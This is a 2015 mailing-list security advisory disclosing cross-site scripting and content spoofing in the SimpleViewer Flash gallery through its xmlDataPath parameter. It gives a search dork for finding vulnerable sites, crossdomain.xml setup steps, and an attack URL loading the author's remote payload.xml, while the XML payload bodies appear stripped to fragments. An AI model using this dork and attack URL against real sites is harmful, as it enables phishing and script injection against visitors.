########################################################################################################
Cross Site Scripting (XSS) & Content spoofing in SimpleViewer all
versions via remote xml payload [2015]
########################################################################################################
$$$$$$ $$ $$ $$ $$ $$
$$ __$$ __| $$ | $$ | $$ |__|
$$ / __|$$ $$$$$$$$$$ $$$$$$ $$ | $$$$$$ $$ | $$ |$$ $$$$$$ $$
$$ $$ $$$$$$ $$$$$$
$$$$$$ $$ |$$ _$$ _$$ $$ __$$ $$ |$$ __$$\$$ $$ |$$ |$$ __$$
$$ | $$ | $$ |$$ __$$ $$ __$$
____$$ $$ |$$ / $$ / $$ |$$ / $$ |$$ |$$$$$$$$ |$$$$ / $$ |$$$$$$$$
|$$ | $$ | $$ |$$$$$$$$ |$$ | __|
$$ $$ |$$ |$$ | $$ | $$ |$$ | $$ |$$ |$$ ____| $$$ / $$ |$$
____|$$ | $$ | $$ |$$ ____|$$ |
$$$$$$ |$$ |$$ | $$ | $$ |$$$$$$$ |$$ |$$$$$$$ $ / $$ |$$$$$$$
$$$$$$$$$ |$$$$$$$ $$ |
______/ __|__| __| __|$$ ____/ __| _______| _/ __| _______|
_________/ _______|__|
$$ |
$$ |
__|
########################################################################################################
EAT, SLEEP, HACK, REPEAT, EAT, SLEEP, HACK, REPEAT, EAT, SLEEP, HACK,
REPEAT, EAT, SLEEP, HACK, REPEAT
########################################################################################################
Vendor: http://www.simpleviewer.net/simpleviewer/
Vulnerable application: simpleviewr.swf
Vulnerability: Execution of javascript and content spoofing
Version: All versions seem vulnerable with modified payloads
Dork: filetype:swf intext:SimpleViewer
Credits: @APT1337, @kelodymelody
SimpleViewer is a free image gallery viewer which comes as a swf flash
script which loads a gallery of
images from a local gallery.xml file. Simpleviewer is used on hundreds
of thousands of web servers by
a range of different users from bloggers all the way to government.
After receiveing no feed back from
the developers of SimpleViewr in regards to this vulnerability and
attempting to reach out to numerous
effected customers of SimpleViewer again with no feed back I feel the
need to disclose this
vulnerability in full, publicly so that people can remove SimpleViewr
from their websites.
I did try to warn you... @NASA, @NYCOURTS, @IEEE, @MIT, @ACM.
SimpleViewer is able to load the gallery.xml file in a number of
different ways:
http://www.example.com/viewer.swf
The above example loads gallery.xml locally on the server
http://www.example.com/viewer.swf?xmlDataPath=gallery.xml
The above example loads gallery.xml or another .xml file defined
using the xmlDataPath variable
http://www.example.com/viewer.swf?xmlDataPath=http://www.example2.com/gallery.xml
The above example loads a remote gallery.xml file providing the
remote server has a
cross-domain policy. This can allow an attacker to include remote
malicious xml files in to
the SimpleViewer applicaion.
SimpleViewer does not check that the gallery.xml file being loaded is
stored locally within the
same domain or check that the gallery.xml file being loaded is being
loaded from a known/safe remote
location. SimpleViewer can be forced to load remote malicious
galleries providing that the server whith
the remote gallery has a cross-domain policy file (crossdomain.xml).
This means that an attacker can load a remote malicious xml file in to
SimpleViewer which can allow an
attacker to both spoof content and execute javascript within the
context of the users browser. This
can be used by an attacker to trick users in to logging in to a fake
login page to steal login
information or trick users in to downloading malicious files.
Before we can exploit this vulnerability in SimpleViewr we must first
create a cross-domain policy
file (crossdomain.xml) which allows SimpleViewer to fetch the payload
from our server.
The crossdomain.xml file would consist of the following code:
The above crossdomain.xml file should be placed in the webroot of the
remote server where the remote
gallery.xml file is located.
SimpleViewr allows the user to customize their gallery using a number
of different variables which
are set within the gallery.xml file. Below is small list of variables
that can be used within the
gallery.xml file:
title - Text to display as gallery title.
imagePath - Relative or absolute path to images folder.
thumbPath - Relative or absolute path to thumbnail images folder.
backgroundImagePath - Relative or absolute path to a JPG or SWF to
load as the gallery background.
An example of one of these gallery.xml files can be found on
simpleviewer.net which is provided as
a demo which is located at the following URL:
Gallery:
http://www.simpleviewer.net/simpleviewer/examples/modern/gallery.xml
SimpleViewer.]]>
---CUT---CUT---CUT---CUT---CUT---CUT---CUT---CUT---CUT---CUT---CUT---CUT---CUT---CUT---CUT---CUT---CUT---
As you can see from the above gallery.xml file there are a number of
variables which we can use to spoof
content and images on the server such as imagePath, thumbPath and
title. We can also trick users in
to executing javascript by including javascript within the HTML anchor
element CLICK FOR PoC]]>
The above exmaple will show "CLICK FOR PoC" as a clickable link which
executes a javascript alert box
once the user clicks on the link.
More of these variables can be found listed at the following URL:
http://simpleviewer.net/simpleviewer/pro/support/v1_9/actionscript_options.html
Using the above information an attacker can create carefully crafted
payloads to spoof content via images
and execute javascript within the context of the users browser. Below
I have created an example payload
as proof of concept which has been tested against SimpleViewr v1.9.
The following payload is provided as a proof of concept:
image.jpg
CLICK FOR PoC]]>
Other versions of SimpleViewer are vulnerable to this same type of
attack but require another slightly
modified payload. Other, more recent versions of SimpleViewer add more
features which an attacker can
use to spoof content and perform other types of attacks.
Version 1.9 was chosen as an example as this seems to be the most
common version found installed on
servers searchable by google.
I have uploaded a working version of this payload to my server so that
people can test to see if they are
vulnerable to this type of attack. This payload can be found at the
following URL:
Payload: http://rm-rf.ninja/payload.xml
Attack:
http://www.example.com/viewer.swf?xmlDataPath=http://rm-rf.ninja/payload.xml
Shouts to @hxmonsegur and all the other researchers out there keeping
it real hunting them 0day!
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
